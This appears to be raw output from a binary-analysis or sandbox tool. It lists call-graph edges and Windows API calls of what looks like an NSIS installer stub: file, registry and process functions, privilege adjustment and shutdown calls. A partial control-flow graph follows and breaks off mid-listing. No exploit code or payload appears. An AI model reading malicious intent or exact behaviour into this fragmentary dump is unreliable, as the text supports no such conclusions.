API calls 4078->4079 4080 402325 4079->4080 4081 402336 lstrlenW lstrlenW 4080->4081 4085 402329 4080->4085 4083 4055dc 28 API calls 4081->4083 4082 4055dc 28 API calls 4086 402331 4082->4086 4084 402374 SHFileOperationW 4083->4084 4084->4085 4084->4086 4085->4082 4085->4086 4087 401d86 4088 401d99 GetDlgItem 4087->4088 4089 401d8c 4087->4089 4090 401d93 4088->4090 4091 402d89 21 API calls 4089->4091 4092 401dda GetClientRect LoadImageW SendMessageW 4090->4092 4093 402dab 21 API calls 4090->4093 4091->4090 4095 401e38 4092->4095 4097 401e44 4092->4097 4093->4092 4096 401e3d DeleteObject 4095->4096 4095->4097 4096->4097 4098 402388 4099 40238f 4098->4099 4101 4023a2 4098->4101 4100 406594 21 API calls 4099->4100 4102 40239c 4100->4102 4103 405bb7 MessageBoxIndirectW 4102->4103 4103->4101 3478 401389 3480 401390 3478->3480 3479 4013fe 3480->3479 3481 4013cb MulDiv SendMessageW 3480->3481 3481->3480 4104 402c0a SendMessageW 4105 402c24 InvalidateRect 4104->4105 4106 402c2f 4104->4106 4105->4106 4107 40460c lstrcpynW lstrlenW 4108 40248f 4109 402dab 21 API calls 4108->4109 4110 4024a1 4109->4110 4111 402dab 21 API calls 4110->4111 4112 4024ab 4111->4112 4125 402e3b 4112->4125 4115 4024e3 4117 4024ef 4115->4117 4120 402d89 21 API calls 4115->4120 4116 402dab 21 API calls 4119 4024d9 lstrlenW 4116->4119 4121 40250e RegSetValueExW 4117->4121 4122 4032b9 35 API calls 4117->4122 4118 402933 4119->4115 4120->4117 4123 402524 RegCloseKey 4121->4123 4122->4121 4123->4118 4126 402e56 4125->4126 4129 4063f2 4126->4129 4130 406401 4129->4130 4131 4024bb 4130->4131 4132 40640c RegCreateKeyExW 4130->4132 4131->4115 4131->4116 4131->4118 4132->4131 4133 402910 4134 402dab 21 API calls 4133->4134 4135 402917 FindFirstFileW 4134->4135 4136 40292a 4135->4136 4137 40293f 4135->4137 4141 40649e wsprintfW 4137->4141 4139 402948 4142 406557 lstrcpynW 4139->4142 4141->4139 4142->4136 4143 401911 4144 401948 4143->4144 4145 402dab 21 API calls 4144->4145 4146 40194d 4145->4146 4147 405c63 71 API calls 4146->4147 4148 401956 4147->4148 4149 401491 4150 4055dc 28 API calls 4149->4150 4151 401498 4150->4151 4152 401914 4153 402dab 21 API calls 4152->4153 4154 40191b 4153->4154 4155 405bb7 MessageBoxIndirectW 4154->4155 4156 401924 4155->4156 4157 404695 4158 4047c7 4157->4158 4159 4046ad 4157->4159 4160 404831 4158->4160 4163 4048fb 4158->4163 4166 404802 GetDlgItem SendMessageW 4158->4166 4162 4044d6 22 API calls 4159->4162 4161 40483b GetDlgItem 4160->4161 4160->4163 4164 404855 4161->4164 4165 4048bc 4161->4165 4167 404714 4162->4167 4168 40453d 8 API calls 4163->4168 4164->4165 4172 40487b SendMessageW LoadCursorW SetCursor 4164->4172 4165->4163 4173 4048ce 4165->4173 4190 4044f8 EnableWindow 4166->4190 4170 4044d6 22 API calls 4167->4170 4171 4048f6 4168->4171 4177 404721 CheckDlgButton 4170->4177 4191 404944 4172->4191 4174 4048e4 4173->4174 4175 4048d4 SendMessageW 4173->4175 4174->4171 4179 4048ea SendMessageW 4174->4179 4175->4174 4176 40482c 4180 404920 SendMessageW 4176->4180 4188 4044f8 EnableWindow 4177->4188 4179->4171 4180->4160 4183 40473f GetDlgItem 4189 40450b SendMessageW 4183->4189 4185 404755 SendMessageW 4186 404772 GetSysColor 4185->4186 4187 40477b SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4185->4187 4186->4187 4187->4171 4188->4183 4189->4185 4190->4176 4194 405b7d ShellExecuteExW 4191->4194 4193 4048aa LoadCursorW SetCursor 4193->4165 4194->4193 4195 402896 4196 40289d 4195->4196 4197 402bae 4195->4197 4198 402d89 21 API calls 4196->4198 4199 4028a4 4198->4199 4200 4028b3 SetFilePointer 4199->4200 4200->4197 4201 4028c3 4200->4201 4203 40649e wsprintfW 4201->4203 4203->4197 4204 401f17 4205 402dab 21 API calls 4204->4205 4206 401f1d 4205->4206 4207 402dab 21 API calls 4206->4207 4208 401f26 4207->4208 4209 402dab 21 API calls 4208->4209 4210 401f2f 4209->4210 4211 402dab 21 API calls 4210->4211 4212 401f38 4211->4212 4213 401423 28 API calls 4212->4213 4214 401f3f 4213->4214 4221 405b7d ShellExecuteExW 4214->4221 4216 401f87 4217 4069f6 5 API calls 4216->4217 4219 402933 4216->4219 4218 401fa4 CloseHandle 4217->4218 4218->4219 4221->4216 4222 402f98 4223 402faa SetTimer 4222->4223 4225 402fc3 4222->4225 4223->4225 4224 403018 4225->4224 4226 402fdd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4225->4226 4226->4224 4227 40571b 4228 4058c5 4227->4228 4229 40573c GetDlgItem GetDlgItem GetDlgItem 4227->4229 4231 4058f6 4228->4231 4232 4058ce GetDlgItem CreateThread CloseHandle 4228->4232 4272 40450b SendMessageW 4229->4272 4234 405921 4231->4234 4235 405946 4231->4235 4236 40590d ShowWindow ShowWindow 4231->4236 4232->4231 4233 4057ac 4239 4057b3 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4233->4239 4237 405981 4234->4237 4241 405935 4234->4241 4242 40595b ShowWindow 4234->4242 4238 40453d 8 API calls 4235->4238 4274 40450b SendMessageW 4236->4274 4237->4235 4249 40598f SendMessageW 4237->4249 4244 405954 4238->4244 4247 405821 4239->4247 4248 405805 SendMessageW SendMessageW 4239->4248 4243 4044af SendMessageW 4241->4243 4245 40597b 4242->4245 4246 40596d 4242->4246 4243->4235 4251 4044af SendMessageW 4245->4251 4250 4055dc 28 API calls 4246->4250 4252 405834 4247->4252 4253 405826 SendMessageW 4247->4253 4248->4247 4249->4244 4254 4059a8 CreatePopupMenu 4249->4254 4250->4245 4251->4237 4256 4044d6 22 API calls 4252->4256 4253->4252 4255 406594 21 API calls 4254->4255 4257 4059b8 AppendMenuW 4255->4257 4258 405844 4256->4258 4261 4059d5 GetWindowRect 4257->4261 4262 4059e8 TrackPopupMenu 4257->4262 4259 405881 GetDlgItem SendMessageW 4258->4259 4260 40584d ShowWindow 4258->4260 4259->4244 4266 4058a8 SendMessageW SendMessageW 4259->4266 4263 405870 4260->4263 4264 405863 ShowWindow 4260->4264 4261->4262 4262->4244 4265 405a03 4262->4265 4273 40450b SendMessageW 4263->4273 4264->4263 4267 405a1f SendMessageW 4265->4267 4266->4244 4267->4267 4268 405a3c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4267->4268 4270 405a61 SendMessageW 4268->4270 4270->4270 4271 405a8a GlobalUnlock SetClipboardData CloseClipboard 4270->4271 4271->4244 4272->4233 4273->4259 4274->4234 4275 401d1c 4276 402d89 21 API calls 4275->4276 4277 401d22 IsWindow 4276->4277 4278 401a25 4277->4278 4279 404d1d 4280 404d49 4279->4280 4281 404d2d 4279->4281 4282 404d7c 4280->4282 4283 404d4f SHGetPathFromIDListW 4280->4283 4290 405b9b GetDlgItemTextW 4281->4290 4285 404d5f 4283->4285 4289 404d66 SendMessageW 4283->4289 4287 40140b 2 API calls 4285->4287 4286 404d3a SendMessageW 4286->4280 4287->4289 4289->4282 4290->4286 4291 40149e 4292 4023a2 4291->4292 4293 4014ac PostQuitMessage 4291->4293 4293->4292 4294 401ba0 4295 401bf1 4294->4295 4296 401bad 4294->4296 4298 401bf6 4295->4298 4299 401c1b GlobalAlloc 4295->4299 4297 401c36 4296->4297 4303 401bc4 4296->4303 4300 406594 21 API calls 4297->4300 4312 4023a2 4297->4312 4298->4312 4315 406557 lstrcpynW 4298->4315 4301 406594 21 API calls 4299->4301 4302 40239c 4300->4302 4301->4297 4307 405bb7 MessageBoxIndirectW 4302->4307 4313 406557 lstrcpynW 4303->4313 4305 401c08 GlobalFree 4305->4312 4307->4312 4308 401bd3 4314 406557 lstrcpynW 4308->4314 4310 401be2 4316 406557 lstrcpynW 4310->4316 4313->4308 4314->4310 4315->4305 4316->4312 4317 402621 4318 402dab 21 API calls 4317->4318 4319 402628 4318->4319 4322 406047 GetFileAttributesW CreateFileW 4319->4322 4321 402634 4322->4321 4323 4025a3 4333 402deb 4323->4333 4326 402d89 21 API calls 4327 4025b6 4326->4327 4328 4025d2 RegEnumKeyW 4327->4328 4329 4025de RegEnumValueW 4327->4329 4330 402933 4327->4330 4331 4025f3 RegCloseKey 4328->4331 4329->4331 4331->4330 4334 402dab 21 API calls 4333->4334 4335 402e02 4334->4335 4336 4063c4 RegOpenKeyExW 4335->4336 4337 4025ad 4336->4337 4337->4326 4338 4015a8 4339 402dab 21 API calls 4338->4339 4340 4015af SetFileAttributesW 4339->4340 4341 4015c1 4340->4341 3482 401fa9 3483 402dab 21 API calls 3482->3483 3484 401faf 3483->3484 3485 4055dc 28 API calls 3484->3485 3486 401fb9 3485->3486 3487 405b3a 2 API calls 3486->3487 3488 401fbf 3487->3488 3489 401fe2 CloseHandle 3488->3489 3493 402933 3488->3493 3497 4069f6 WaitForSingleObject 3488->3497 3489->3493 3492 401fd4 3494 401fe4 3492->3494 3495 401fd9 3492->3495 3494->3489 3502 40649e wsprintfW 3495->3502 3498 406a10 3497->3498 3499 406a22 GetExitCodeProcess 3498->3499 3500 406987 2 API calls 3498->3500 3499->3492 3501 406a17 WaitForSingleObject 3500->3501 3501->3498 3502->3489 4342 40202f 4343 402dab 21 API calls 4342->4343 4344 402036 4343->4344 4345 40694b 5 API calls 4344->4345 4346 402045 4345->4346 4347 402061 GlobalAlloc 4346->4347 4348 4020d1 4346->4348 4347->4348 4349 402075 4347->4349 4350 40694b 5 API calls 4349->4350 4351 40207c 4350->4351 4352 40694b 5 API calls 4351->4352 4353 402086 4352->4353 4353->4348 4357 40649e wsprintfW 4353->4357 4355 4020bf 4358 40649e wsprintfW 4355->4358 4357->4355 4358->4348 4359 40252f 4360 402deb 21 API calls 4359->4360 4361 402539 4360->4361 4362 402dab 21 API calls 4361->4362 4363 402542 4362->4363 4364 402933 4363->4364 4365 40254d RegQueryValueExW 4363->4365 4366 40256d 4365->4366 4369 402573 RegCloseKey 4365->4369 4366->4369 4370 40649e wsprintfW 4366->4370 4369->4364 4370->4369 4371 4021af 4372 402dab 21 API calls 4371->4372 4373 4021b6 4372->4373 4374 402dab 21 API calls 4373->4374 4375 4021c0 4374->4375 4376 402dab 21 API calls 4375->4376 4377 4021ca 4376->4377 4378 402dab 21 API calls 4377->4378 4379 4021d4 4378->4379 4380 402dab 21 API calls 4379->4380 4381 4021de 4380->4381 4382 40221d CoCreateInstance 4381->4382 4383 402dab 21 API calls 4381->4383 4386 40223c 4382->4386 4383->4382 4384 401423 28 API calls 4385 4022fb 4384->4385 4386->4384 4386->4385 2925 403532 SetErrorMode GetVersionExW 2926 403586 GetVersionExW 2925->2926 2927 4035be 2925->2927 2926->2927 2928 403615 2927->2928 2929 40694b 5 API calls 2927->2929 3013 4068db GetSystemDirectoryW 2928->3013 2929->2928 2931 40362b lstrlenA 2931->2928 2932 40363b 2931->2932 3016 40694b GetModuleHandleA 2932->3016 2935 40694b 5 API calls 2936 403649 2935->2936 2937 40694b 5 API calls 2936->2937 2941 403655 #17 OleInitialize SHGetFileInfoW 2937->2941 2940 4036a4 GetCommandLineW 3023 406557 lstrcpynW 2940->3023 3022 406557 lstrcpynW 2941->3022 2943 4036b6 3024 405e53 2943->3024 2946 4037f0 2947 403804 GetTempPathW 2946->2947 3028 403501 2947->3028 2949 40381c 2950 403820 GetWindowsDirectoryW lstrcatW 2949->2950 2951 403876 DeleteFileW 2949->2951 2954 403501 12 API calls 2950->2954 3038 403082 GetTickCount GetModuleFileNameW 2951->3038 2952 405e53 CharNextW 2953 4036ee 2952->2953 2953->2946 2953->2952 2959 4037f2 2953->2959 2956 40383c 2954->2956 2956->2951 2958 403840 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 2956->2958 2957 40388a 2960 403941 2957->2960 2963 403931 2957->2963 2967 405e53 CharNextW 2957->2967 2961 403501 12 API calls 2958->2961 3123 406557 lstrcpynW 2959->3123 3215 403b4f 2960->3215 2965 40386e 2961->2965 3066 403c29 2963->3066 2965->2951 2965->2960 2981 4038a9 2967->2981 2969 403ab3 2972 403b37 ExitProcess 2969->2972 2973 403abb GetCurrentProcess OpenProcessToken 2969->2973 2970 403a8f 3222 405bb7 2970->3222 2974 403ad3 LookupPrivilegeValueW AdjustTokenPrivileges 2973->2974 2975 403b07 2973->2975 2974->2975 2982 40694b 5 API calls 2975->2982 2976 403907 3124 405f2e 2976->3124 2977 40394a 3141 405b22 2977->3141 2981->2976 2981->2977 2985 403b0e 2982->2985 2988 403b23 ExitWindowsEx 2985->2988 2990 403b30 2985->2990 2988->2972 2988->2990 2989 403969 2992 403972 2989->2992 3010 403981 2989->3010 3226 40140b 2990->3226 3145 406557 lstrcpynW 2992->3145 2994 403926 3140 406557 lstrcpynW 2994->3140 2997 4039a7 wsprintfW 3146 406594 2997->3146 3001 4039e3 GetFileAttributesW 3003 4039ef DeleteFileW 3001->3003 3001->3010 3002 403a1d SetCurrentDirectoryW 3205 406317 MoveFileExW 3002->3205 3003->3010 3007 406317 40 API calls 3007->3010 3008 406594 21 API calls 3008->3010 3010->2960 3010->2997 3010->3001 3010->3002 3010->3007 3010->3008 3011 403aa5 CloseHandle 3010->3011 3163 405aab CreateDirectoryW 3010->3163 3166 405b05 CreateDirectoryW 3010->3166 3169 405c63 3010->3169 3209 405b3a CreateProcessW 3010->3209 3212 4068b4 FindFirstFileW 3010->3212 3011->2960 3014 4068fd wsprintfW LoadLibraryExW 3013->3014 3014->2931 3017 406971 GetProcAddress 3016->3017 3018 406967 3016->3018 3019 403642 3017->3019 3020 4068db 3 API calls 3018->3020 3019->2935 3021 40696d 3020->3021 3021->3017 3021->3019 3022->2940 3023->2943 3025 405e59 3024->3025 3026 4036dc CharNextW 3025->3026 3027 405e60 CharNextW 3025->3027 3026->2953 3027->3025 3229 406805 3028->3229 3030 403517 3030->2949 3031 40350d 3031->3030 3238 405e26 lstrlenW CharPrevW 3031->3238 3034 405b05 2 API calls 3035 403525 3034->3035 3241 406076 3035->3241 3245 406047 GetFileAttributesW CreateFileW 3038->3245 3040 4030c2 3058 4030d2 3040->3058 3246 406557 lstrcpynW 3040->3246 3042 4030e8 3247 405e72 lstrlenW 3042->3247 3046 4030f9 GetFileSize 3047 4031f3 3046->3047 3060 403110 3046->3060 3252 40301e 3047->3252 3049 4031fc 3051 40322c GlobalAlloc 3049->3051 3049->3058 3287 4034ea SetFilePointer 3049->3287 3263 4034ea SetFilePointer 3051->3263 3053 40325f 3055 40301e 6 API calls 3053->3055 3055->3058 3056 403215 3059 4034d4 ReadFile 3056->3059 3057 403247 3264 4032b9 3057->3264 3058->2957 3062 403220 3059->3062 3060->3047 3060->3053 3060->3058 3063 40301e 6 API calls 3060->3063 3284 4034d4 3060->3284 3062->3051 3062->3058 3063->3060 3064 403253 3064->3058 3064->3064 3065 403290 SetFilePointer 3064->3065 3065->3058 3067 40694b 5 API calls 3066->3067 3068 403c3d 3067->3068 3069 403c43 GetUserDefaultUILanguage 3068->3069 3070 403c55 3068->3070 3308 40649e wsprintfW 3069->3308 3317 406425 3070->3317 3074 403c53 3309 403eff 3074->3309 3075 403ca4 lstrcatW 3075->3074 3076 406425 3 API calls 3076->3075 3079 405f2e 18 API calls 3080 403cd6 3079->3080 3081 403d6a 3080->3081 3083 406425 3 API calls 3080->3083 3082 405f2e 18 API calls 3081->3082 3084 403d70 3082->3084 3085 403d08 3083->3085 3086 403d80 LoadImageW 3084->3086 3087 406594 21 API calls 3084->3087 3085->3081 3092 403d29 lstrlenW 3085->3092 3093 405e53 CharNextW 3085->3093 3088 403e26 3086->3088 3089 403da7 RegisterClassW 3086->3089 3087->3086 3091 40140b 2 API calls 3088->3091 3090 403ddd SystemParametersInfoW CreateWindowExW 3089->3090 3099 403e30 3089->3099 3090->3088 3096 403e2c 3091->3096 3094 403d37 lstrcmpiW 3092->3094 3095 403d5d 3092->3095 3097 403d26 3093->3097 3094->3095 3098 403d47 GetFileAttributesW 3094->3098 3100 405e26 3 API calls 3095->3100 3096->3099 3102 403eff 22 API calls 3096->3102 3097->3092 3101 403d53 3098->3101 3099->2960 3103 403d63 3100->3103 3101->3095 3104 405e72 2 API calls 3101->3104 3105 403e3d 3102->3105 3322 406557 lstrcpynW 3103->3322 3104->3095 3107 403e49 ShowWindow 3105->3107 3108 403ecc 3105->3108 3110 4068db 3 API calls 3107->3110 3323 4056af OleInitialize 3108->3323 3112 403e61 3110->3112 3111 403ed2 3113 403ed6 3111->3113 3114 403eee 3111->3114 3115 403e6f GetClassInfoW 3112->3115 3119 4068db 3 API calls 3112->3119 3113->3099 3121 40140b 2 API calls 3113->3121 3118 40140b 2 API calls 3114->3118 3116 403e83 GetClassInfoW RegisterClassW 3115->3116 3117 403e99 DialogBoxParamW 3115->3117 3116->3117 3120 40140b 2 API calls 3117->3120 3118->3099 3119->3115 3122 403ec1 3120->3122 3121->3099 3122->3099 3123->2947 3345 406557 lstrcpynW 3124->3345 3126 405f3f 3346 405ed1 CharNextW CharNextW 3126->3346 3129 403913 3129->2960 3139 406557 lstrcpynW 3129->3139 3130 406805 5 API calls 3131 405f55 3130->3131 3131->3129 3136 405f6c 3131->3136 3132 405f86 lstrlenW 3133 405f91 3132->3133 3132->3136 3134 405e26 3 API calls 3133->3134 3137 405f96 GetFileAttributesW 3134->3137 3135 4068b4 2 API calls 3135->3136 3136->3129 3136->3132 3136->3135 3138 405e72 2 API calls 3136->3138 3137->3129 3138->3132 3139->2994 3140->2963 3142 40694b 5 API calls 3141->3142 3143 40394f lstrlenW 3142->3143 3144 406557 lstrcpynW 3143->3144 3144->2989 3145->3010 3161 40659f 3146->3161 3147 4067e6 3148 4067ff 3147->3148 3354 406557 lstrcpynW 3147->3354 3148->3010 3150 4067b7 lstrlenW 3150->3161 3152 406425 3 API calls 3152->3161 3154 4066b0 GetSystemDirectoryW 3154->3161 3155 406594 15 API calls 3155->3150 3156 4066c6 GetWindowsDirectoryW 3156->3161 3157 406805 5 API calls 3157->3161 3158 406594 15 API calls 3158->3161 3159 406758 lstrcatW 3159->3161 3160 40694b 5 API calls 3160->3161 3161->3147 3161->3150 3161->3152 3161->3154 3161->3155 3161->3156 3161->3157 3161->3158 3161->3159 3161->3160 3162 406728 SHGetPathFromIDListW CoTaskMemFree 3161->3162 3352 40649e wsprintfW 3161->3352 3353 406557 lstrcpynW 3161->3353 3162->3161 3164 405afb GetLastError 3163->3164 3165 405af7 3163->3165 3164->3165 3165->3010 3167 405b15 3166->3167 3168 405b19 GetLastError 3166->3168 3167->3010 3168->3167 3170 405f2e 18 API calls 3169->3170 3171 405c83 3170->3171 3172 405ca2 3171->3172 3173 405c8b DeleteFileW 3171->3173 3174 405dc2 3172->3174 3355 406557 lstrcpynW 3172->3355 3202 405dd9 3173->3202 3181 4068b4 2 API calls 3174->3181 3174->3202 3176 405cc8 3177 405cdb 3176->3177 3178 405cce lstrcatW 3176->3178 3180 405e72 2 API calls 3177->3180 3179 405ce1 3178->3179 3182 405cf1 lstrcatW 3179->3182 3184 405cfc lstrlenW FindFirstFileW 3179->3184 3180->3179 3183 405de7 3181->3183 3182->3184 3185 405e26 3 API calls 3183->3185 3183->3202 3184->3174 3186 405d1e 3184->3186 3187 405df1 3185->3187 3188 405da5 FindNextFileW 3186->3188 3198 405c63 64 API calls 3186->3198 3200 4055dc 28 API calls 3186->3200 3203 4055dc 28 API calls 3186->3203 3204 406317 40 API calls 3186->3204 3356 406557 lstrcpynW 3186->3356 3357 405c1b 3186->3357 3189 405c1b 5 API calls 3187->3189 3188->3186 3192 405dbb FindClose 3188->3192 3191 405dfd 3189->3191 3193 405e17 3191->3193 3194 405e01 3191->3194 3192->3174 3196 4055dc 28 API calls 3193->3196 3197 4055dc 28 API calls 3194->3197 3194->3202 3196->3202 3199 405e0e 3197->3199 3198->3186 3201 406317 40 API calls 3199->3201 3200->3188 3201->3202 3202->3010 3203->3186 3204->3186 3206 403a2c CopyFileW 3205->3206 3207 40632b 3205->3207 3206->2960 3206->3010 3368 40619d 3207->3368 3210 405b79 3209->3210 3211 405b6d CloseHandle 3209->3211 3210->3010 3211->3210 3213 4068ca FindClose 3212->3213 3214 4068d5 3212->3214 3213->3214 3214->3010 3216 403b67 3215->3216 3217 403b59 CloseHandle 3215->3217 3402 403b94 3216->3402 3217->3216 3220 405c63 71 API calls 3221 403a82 OleUninitialize 3220->3221 3221->2969 3221->2970 3223 405bcc 3222->3223 3224 403a9d ExitProcess 3223->3224 3225 405be0 MessageBoxIndirectW 3223->3225 3225->3224 3227 401389 2 API calls 3226->3227 3228 401420 3227->3228 3228->2972 3235 406812 3229->3235 3230 40688d CharPrevW 3231 406888 3230->3231 3231->3230 3233 4068ae 3231->3233 3232 40687b CharNextW 3232->3231 3232->3235 3233->3031 3234 405e53 CharNextW 3234->3235 3235->3231 3235->3232 3235->3234 3236 406867 CharNextW 3235->3236 3237 406876 CharNextW 3235->3237 3236->3235 3237->3232 3239 405e42 lstrcatW 3238->3239 3240 40351f 3238->3240 3239->3240 3240->3034 3242 406083 GetTickCount GetTempFileNameW 3241->3242 3243 4060b9 3242->3243 3244 403530 3242->3244 3243->3242 3243->3244 3244->2949 3245->3040 3246->3042 3248 405e80 3247->3248 3249 4030ee 3248->3249 3250 405e86 CharPrevW 3248->3250 3251 406557 lstrcpynW 3249->3251 3250->3248 3250->3249 3251->3046 3253 403027 3252->3253 3254 40303f 3252->3254 3255 403030 DestroyWindow 3253->3255 3256 403037 3253->3256 3257 403047 3254->3257 3258 40304f GetTickCount 3254->3258 3255->3256 3256->3049 3288 406987 3257->3288 3259 403080 3258->3259 3260 40305d CreateDialogParamW ShowWindow 3258->3260 3259->3049 3260->3259 3263->3057 3266 4032d2 3264->3266 3265 403300 3267 4034d4 ReadFile 3265->3267 3266->3265 3294 4034ea SetFilePointer 3266->3294 3269 40330b 3267->3269 3270 40346d 3269->3270 3271 40331d GetTickCount 3269->3271 3273 403457 3269->3273 3272 4034af 3270->3272 3277 403471 3270->3277 3271->3273 3280 40336c 3271->3280 3274 4034d4 ReadFile 3272->3274 3273->3064 3274->3273 3275 4034d4 ReadFile 3275->3280 3276 4034d4 ReadFile 3276->3277 3277->3273 3277->3276 3278 4060f9 WriteFile 3277->3278 3278->3277 3279 4033c2 GetTickCount 3279->3280 3280->3273 3280->3275 3280->3279 3281 4033e7 MulDiv wsprintfW 3280->3281 3292 4060f9 WriteFile 3280->3292 3295 4055dc 3281->3295 3306 4060ca ReadFile 3284->3306 3287->3056 3289 4069a4 PeekMessageW 3288->3289 3290 40304d 3289->3290 3291 40699a DispatchMessageW 3289->3291 3290->3049 3291->3289 3293 406117 3292->3293 3293->3280 3294->3265 3296 4055f7 3295->3296 3297 405699 3295->3297 3298 405613 lstrlenW 3296->3298 3301 406594 21 API calls 3296->3301 3297->3280 3299 405621 lstrlenW 3298->3299 3300 40563c 3298->3300 3299->3297 3302 405633 lstrcatW 3299->3302 3303 405642 SetWindowTextW 3300->3303 3304 40564f 3300->3304 3301->3298 3302->3300 3303->3304 3304->3297 3305 405655 SendMessageW SendMessageW SendMessageW 3304->3305 3305->3297 3307 4034e7 3306->3307 3307->3060 3308->3074 3310 403f13 3309->3310 3330 40649e wsprintfW 3310->3330 3312 403f84 3331 403fb8 3312->3331 3314 403cb4 3314->3079 3315 403f89 3315->3314 3316 406594 21 API calls 3315->3316 3316->3315 3334 4063c4 3317->3334 3320 403c85 3320->3075 3320->3076 3321 406459 RegQueryValueExW RegCloseKey 3321->3320 3322->3081 3338 404522 3323->3338 3325 404522 SendMessageW 3327 40570b OleUninitialize 3325->3327 3326 4056d2 3329 4056f9 3326->3329 3341 401389 3326->3341 3327->3111 3329->3325 3330->3312 3332 406594 21 API calls 3331->3332 3333 403fc6 SetWindowTextW 3332->3333 3333->3315 3335 4063d3 3334->3335 3336 4063d7 3335->3336 3337 4063dc RegOpenKeyExW 3335->3337 3336->3320 3336->3321 3337->3336 3339 40453a 3338->3339 3340 40452b SendMessageW 3338->3340 3339->3326 3340->3339 3343 401390 3341->3343 3342 4013fe 3342->3326 3343->3342 3344 4013cb MulDiv SendMessageW 3343->3344 3344->3343 3345->3126 3347 405eee 3346->3347 3350 405f00 3346->3350 3349 405efb CharNextW 3347->3349 3347->3350 3348 405f24 3348->3129 3348->3130 3349->3348 3350->3348 3351 405e53 CharNextW 3350->3351 3351->3350 3352->3161 3353->3161 3354->3148 3355->3176 3356->3186 3365 406022 GetFileAttributesW 3357->3365 3360 405c48 3360->3186 3361 405c36 RemoveDirectoryW 3363 405c44 3361->3363 3362 405c3e DeleteFileW 3362->3363 3363->3360 3364 405c54 SetFileAttributesW 3363->3364 3364->3360 3366 405c27 3365->3366 3367 406034 SetFileAttributesW 3365->3367 3366->3360 3366->3361 3366->3362 3367->3366 3369 4061f3 GetShortPathNameW 3368->3369 3370 4061cd 3368->3370 3372 406312 3369->3372 3373 406208 3369->3373 3395 406047 GetFileAttributesW CreateFileW 3370->3395 3372->3206 3373->3372 3375 406210 wsprintfA 3373->3375 3374 4061d7 CloseHandle GetShortPathNameW 3374->3372 3376 4061eb 3374->3376 3377 406594 21 API calls 3375->3377 3376->3369 3376->3372 3378 406238 3377->3378 3396 406047 GetFileAttributesW CreateFileW 3378->3396 3380 406245 3380->3372 3381 406254 GetFileSize GlobalAlloc 3380->3381 3382 406276 3381->3382 3383 40630b CloseHandle 3381->3383 3384 4060ca ReadFile 3382->3384 3383->3372 3385 40627e 3384->3385 3385->3383 3397 405fac lstrlenA 3385->3397 3388 406295 lstrcpyA 3391 4062b7 3388->3391 3389 4062a9 3390 405fac 4 API calls 3389->3390 3390->3391 3392 4062ee SetFilePointer 3391->3392 3393 4060f9 WriteFile 3392->3393 3394 406304 GlobalFree 3393->3394 3394->3383 3395->3374 3396->3380 3398 405fed lstrlenA 3397->3398 3399 405ff5 3398->3399 3400 405fc6 lstrcmpiA 3398->3400 3399->3388 3399->3389 3400->3399 3401 405fe4 CharNextA 3400->3401 3401->3398 3403 403ba2 3402->3403 3404 403ba7 FreeLibrary GlobalFree 3403->3404 3405 403b6c 3403->3405 3404->3404 3404->3405 3405->3220 4387 401a35 4388 402dab 21 API calls 4387->4388 4389 401a3e ExpandEnvironmentStringsW 4388->4389 4390 401a52 4389->4390 4392 401a65 4389->4392 4391 401a57 lstrcmpW 4390->4391 4390->4392 4391->4392 4398 4023b7 4399 4023c5 4398->4399 4400 4023bf 4398->4400 4402 4023d3 4399->4402 4403 402dab 21 API calls 4399->4403 4401 402dab 21 API calls 4400->4401 4401->4399 4404 4023e1 4402->4404 4405 402dab 21 API calls 4402->4405 4403->4402 4406 402dab 21 API calls 4404->4406 4405->4404 4407 4023ea WritePrivateProfileStringW 4406->4407 4408 4014b8 4409 4014be 4408->4409 4410 401389 2 API calls 4409->4410 4411 4014c6 4410->4411 4412 402439 4413 402441 4412->4413 4414 40246c 4412->4414 4416 402deb 21 API calls 4413->4416 4415 402dab 21 API calls 4414->4415 4417 402473 4415->4417 4418 402448 4416->4418 4423 402e69 4417->4423 4420 402dab 21 API calls 4418->4420 4422 402480 4418->4422 4421 402459 RegDeleteValueW RegCloseKey 4420->4421 4421->4422 4424 402e76 4423->4424 4425 402e7d 4423->4425 4424->4422 4425->4424 4427 402eae 4425->4427 4428 4063c4 RegOpenKeyExW 4427->4428 4429 402edc 4428->4429 4430 402eec RegEnumValueW 4429->4430 4434 402f0f 4429->4434 4438 402f86 4429->4438 4431 402f76 RegCloseKey 4430->4431 4430->4434 4431->4438 4432 402f4b RegEnumKeyW 4433 402f54 RegCloseKey 4432->4433 4432->4434 4435 40694b 5 API calls 4433->4435 4434->4431 4434->4432 4434->4433 4436 402eae 6 API calls 4434->4436 4437 402f64 4435->4437 4436->4434 4437->4438 4439 402f68 RegDeleteKeyW 4437->4439 4438->4424 4439->4438 4440 40173a 4441 402dab 21 API calls 4440->4441 4442 401741 SearchPathW 4441->4442 4443 40175c 4442->4443 4444 401d3d 4445 402d89 21 API calls 4444->4445 4446 401d44 4445->4446 4447 402d89 21 API calls 4446->4447 4448 401d50 GetDlgItem 4447->4448 4449 40263d 4448->4449

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 0 403532-403584 SetErrorMode GetVersionExW 1 403586-4035b6 GetVersionExW 0->1 2 4035be-4035c3 0->2 1->2 3 4035c5 2->3 4 4035cb-40360d 2->4 3->4 5 403620 4->5 6 40360f-403617 call 40694b 4->6 8 403625-403639 call 4068db lstrlenA 5->8 6->5 12 403619 6->12 13 40363b-403657 call 40694b * 3 8->13 12->5 20 403668-4036cc #17 OleInitialize SHGetFileInfoW call 406557 GetCommandLineW call 406557 13->20 21 403659-40365f 13->21 28 4036d5-4036e9 call 405e53 CharNextW 20->28 29 4036ce-4036d0 20->29 21->20 25 403661 21->25 25->20 32 4037e4-4037ea 28->32 29->28 33 4037f0 32->33 34 4036ee-4036f4 32->34 37 403804-40381e GetTempPathW call 403501 33->37 35 4036f6-4036fb 34->35 36 4036fd-403704 34->36 35->35 35->36 38 403706-40370b 36->38 39 40370c-403710 36->39 44 403820-40383e GetWindowsDirectoryW lstrcatW call 403501 37->44 45 403876-403890 DeleteFileW call 403082 37->45 38->39 42 4037d1-4037e0 call 405e53 39->42 43 403716-40371c 39->43 42->32 61 4037e2-4037e3 42->61 47 403736-40376f 43->47 48 40371e-403725 43->48 44->45 64 403840-403870 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403501 44->64 66 403896-40389c 45->66 